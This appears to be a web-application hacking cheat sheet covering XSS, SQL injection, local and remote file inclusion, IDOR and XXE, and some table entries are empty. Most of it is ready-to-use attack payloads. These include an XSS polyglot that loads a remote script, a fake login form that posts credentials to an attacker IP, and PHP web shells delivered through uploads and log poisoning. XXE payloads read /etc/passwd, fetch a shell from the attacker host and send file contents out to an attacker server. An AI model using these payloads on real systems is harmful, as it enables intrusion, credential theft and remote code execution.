Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
Code | Description |
---|---|
| Basic XSS Payload |
| Basic XSS Payload |
| Basic XSS Payload |
| HTML-based XSS Payload |
| Change Background Color |
| Change Background Image |
| Change Website Title |
| Overwrite website's main body |
| Remove certain HTML element |
| Load remote script |
| Send Cookie details to us |
| Load remote ini file via iframe tag |
| Login Form Injection |
curl -isk "https://site.com" | Test for status of Content Security Policy |
Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)
document.getElementById('urlform').remove();
Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
After successfully authenticating to a SQL Server It is worth a shot to verify if xp_cmdshell has been previously activated with:
EXEC xp_cmdshell 'net user';
If xp_cmdshell has not been activated, run the below commands to activate and utilize Windows XP cmd commands within SQL:
# The command below enables sp_configure
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; sp_configure;
message EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic SQL Testing
Command | Description |
---|---|
| Select data from database |
| Specify table to retrieve data |
| Filter query to match a given condition |
| Add single row to table |
| Used to Create a TABLE, DATABASE, INDEX or VIEW |
| Add/Remove columns from a table |
| Update table data |
| Delete rows from table |
| Used to rename column/table with alias |
| Combine rows from 2 or more tables |
| Combine query conditions (must meet all conditions) |
| Combine query conditions. (only one must be met) |
| Limit the amount of rows returned |
| Specify multiple values (only used with WHERE) |
| Return value on a specified condition |
| Return only rows with a NULL value |
| Search for pattern in a column |
| Write a transaction to the database |
| Undo a transaction |
| Delete TABLE, DATABASE or INDEX |
| Group data into logical sets |
| Set order of results |
| Functions like WHERE but filters groups |
| Count rows |
| Return a sum of a column |
| Return average of a column |
| Return min value of a column |
| Return max value of a column |
MySQL Basics
Command | Description |
---|---|
General | |
| login to mysql database |
| List available databases |
| Switch to database |
Tables | |
| Add a new table |
| List available tables in current database |
| Show table properties and columns |
| Add values to table |
| Add values to specific columns in a table |
| Update table values |
Columns | |
| Show all columns in a table |
| Show specific columns in a table |
| Delete a table |
| Add new column |
| Rename column |
| Change column datatype |
| Delete column |
Output | |
| Sort by column |
| Sort by column in descending order |
| Sort by two-columns |
| Only show first two results |
| Only show first two results starting from index 2 |
| List results that meet a condition |
| List results where the name is similar to a given string |
MySQL Operator Precedence
Division (
/
), Multiplication (*
), and Modulus (%
)Addition (
+
) and Subtraction (-
)Comparison (
=
,>
,<
,<=
,>=
,!=
,LIKE
)NOT (
!
)AND (
&&
)OR (
||
)
SQL Injection
Payload | Description |
---|---|
Auth Bypass | |
| Basic Auth Bypass |
| Basic Auth Bypass With comments |
Union Injection | |
| Detect number of columns using |
| Detect number of columns using Union injection |
| Basic Union injection |
| Union injection for 4 columns |
DB Enumeration | |
| Fingerprint MySQL with query output |
| Fingerprint MySQL with no output |
| Current database name |
| List all databases |
| List all tables in a specific database |
| List all columns in a specific table |
| Dump data from a table in another database |
Privileges | |
| Find current user |
| Find if user has admin privileges |
| Find if all user privileges |
| Find which directories can be accessed through MySQL |
File Injection | |
| Read local file |
| Write a string to a local file |
| Write a web shell into the base web directory |
NoSQL Basics
Command | Description |
---|---|
| List all the databases present |
| Switch to database named "user_creds" |
| List out the collections in a database |
| Dump the contents of the documents present in the flag collection |
| Basic NoSQLi Login |
SQLmap
Command | Description |
---|---|
| View the basic help menu |
| View the advanced help menu |
| Run |
|
|
| POST request specifying an injection point with an asterisk |
| Passing an HTTP request file to |
| Specifying a cookie header |
| Specifying a PUT request |
| Store traffic to an output file |
| Specify verbosity level |
| Specifying a prefix or suffix |
| Specifying the level and risk |
| Basic DB enumeration |
| Table enumeration |
| Table/row enumeration |
| Conditional enumeration |
| Database schema enumeration |
| Searching for data |
| Password enumeration and cracking |
| Anti-CSRF token bypass |
| List all tamper scripts |
| Check for DBA privileges |
| Reading a local file |
| Writing a file |
| Spawning an OS shell |
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI workaround PoC
LFI via this path does not work at first
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing character with ? you may receive a successful response (200)
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
Fuzzing Parameters
# Fuff
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
Basic Bypasses
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
PHP Filters
php://filter/read=convert.base64-encode/resource=config
PHP Wrappers
Data Wrapper
The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep allow_url_include
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
Must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep expect
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Remote File Inclusion (RFI)
# Verify RFI
cat php.ini | grep allow_url_include
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
LFI & File Uploads
Image Upload
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
ZIP Upload
# Create Malicous ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
PHAR Upload
# Create Malicous PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>
# Poison Log
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2.log&cmd=id
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace
IDs
in urls, headers and body :/users/01
=>/users/02
Try Parameter Pollution:
users=01
=>users=01&users=02
Special Characters:
/users/01*
or/users/*
=> Disclosure of every single userTry Older versions of API endpoints:
/api/v3/users/01
=>/api/v1/users/02
Add extension:
/users/01
=>/users/02.json
Change Request Methods: POST /users/01 =>
GET, PUT, PATCH, DELETE, OPTIONS,
etcCheck if Referer or other Headers are used to validate
IDs:
Encrypted IDs: If application is using encrypted IDs, try to decrypt using hashing/cracking tool
Send wildcard
{""user_id"":""*""}
Send ID twice
URL?id=&id=
JSON wrap {“id”:111} -->
{“id”:{“id”:111}}
Wrap ID with an array {“id”:111} -->
{“id”:[111]}
Swap GUID with Numeric ID or email:
/users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX
=>/users/02
or/users/a@b.com
Try GUIDs such as:
00000000-0000-0000-000000000000
and11111111-1111-1111-111111111111
GUID Enumeration: Try to disclose GUIDs using
Google Dorks
,Github
,Wayback
,Burp history
If none of the GUID Enumeration methods work then try:
SignUp
,Reset Password
, andother endpoints
and analyze the responses. An endpoint may disclose user's GUID within the application.When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers
Send Post request with path to xml file for exploitation
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
OR Use a script to send payload: curl.sh
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
ID.xml
<!--ID command example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Read Robots.txt (Base 64)
<!--Base64 response example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/respource=http://vulnerable site/" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Local File Disclosure
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
RCE
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Advanced File Disclosure
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
Error Based XXE
# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
# Upload XXE
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Blind Data Exfiltration
Out of Band Data Exfiltration
# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
# PHP Server Setup
?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Last updated